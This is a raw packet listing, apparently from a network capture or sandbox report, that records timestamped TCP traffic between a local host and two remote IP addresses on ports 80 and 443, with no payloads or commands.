                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941812992 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941821098 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941847086 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941870928 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941899061 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941910028 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941920042 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941940069 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941941023 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941971064 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941987991 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.941998959 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942009926 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942020893 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942032099 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942034960 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942048073 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942066908 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942070007 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942079067 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942091942 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942101955 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942112923 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942117929 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942125082 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942140102 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942145109 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942162991 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.942177057 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943002939 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943013906 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943023920 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943034887 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943044901 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943052053 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943054914 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943068027 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943078041 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943080902 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943089962 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943099022 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943101883 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943109035 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943119049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943136930 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943140030 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943149090 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943160057 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943164110 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943171024 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943181038 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943187952 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943191051 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943203926 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943209887 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943217039 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943222046 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943228006 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943236113 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943239927 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943250895 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943263054 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943264961 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943274975 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943284035 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943295956 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943332911 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943634033 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943682909 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943758011 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943768978 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943778992 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943790913 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943802118 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943808079 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943813086 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943826914 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943835974 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943835974 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943855047 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:16.943885088 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056381941 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056399107 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056415081 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056426048 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056432962 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056437016 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056443930 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056449890 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056461096 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056469917 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056473017 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056487083 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056494951 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056499958 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056504965 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056512117 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056524038 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056525946 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056538105 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056545973 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056557894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056560993 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056572914 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056575060 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056586981 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056600094 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056603909 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056611061 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056616068 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056624889 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056629896 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056642056 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056646109 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056653023 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056655884 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056663036 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056672096 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056674957 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056684971 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056684971 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056696892 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056705952 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056713104 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056724072 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056731939 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056735039 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056740999 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056766033 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056797981 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056808949 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056818008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056830883 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056855917 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056862116 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056871891 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056884050 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056902885 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056907892 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056917906 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056920052 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056931019 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056940079 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056946993 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056952000 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056957960 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056968927 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056977987 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.056982040 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057003975 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057037115 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057060957 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057071924 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057080984 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057092905 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057102919 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057107925 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057121038 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057138920 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057138920 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057148933 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057159901 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057162046 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057178974 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057204962 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057208061 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057219028 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057229042 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057245970 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057249069 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057256937 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057266951 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057271004 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057286024 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057287931 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057302952 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057303905 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057315111 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057328939 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057332993 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057338953 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057359934 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057369947 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057398081 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057436943 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057450056 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057454109 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057475090 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057487011 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057507992 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057518959 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057537079 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057547092 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057560921 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057560921 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057564974 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057578087 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057586908 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057588100 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057607889 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057635069 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057662964 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057723999 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057734013 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057766914 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057784081 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057795048 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057805061 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057830095 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057848930 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.057998896 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058010101 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058021069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058032036 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058042049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058051109 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058053970 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058064938 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058079004 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058111906 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058227062 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058237076 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.058274984 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.128041029 CET4436383913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.128477097 CET63839443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.128496885 CET4436383913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.128937960 CET63839443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.128942966 CET4436383913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.259921074 CET4436383913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.260216951 CET4436383913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.260291100 CET63839443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.260328054 CET63839443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.260349989 CET4436383913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.260361910 CET63839443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.260366917 CET4436383913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.263256073 CET63844443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.263331890 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.263566971 CET63844443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.263714075 CET63844443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.263746977 CET4436384413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.394139051 CET4436384113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.394925117 CET63841443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.394925117 CET63841443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.394962072 CET4436384113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.394984007 CET4436384113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.421509981 CET4436384013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.422616005 CET63840443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.422631979 CET4436384013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.425149918 CET63840443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.425156116 CET4436384013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.448807001 CET4436384313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.449282885 CET63843443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.449300051 CET4436384313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.450155973 CET63843443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.450160980 CET4436384313.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.452614069 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.452958107 CET63842443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.452975988 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.453543901 CET63842443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.453551054 CET4436384213.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.523890972 CET4436384113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.524019957 CET4436384113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.524291992 CET63841443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.524291992 CET63841443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.524319887 CET63841443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.524341106 CET4436384113.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.526845932 CET63845443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.526927948 CET4436384513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.527458906 CET63845443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.529460907 CET63845443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.529500008 CET4436384513.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.558232069 CET4436384013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:17.558355093 CET4436384013.107.246.45192.168.2.4
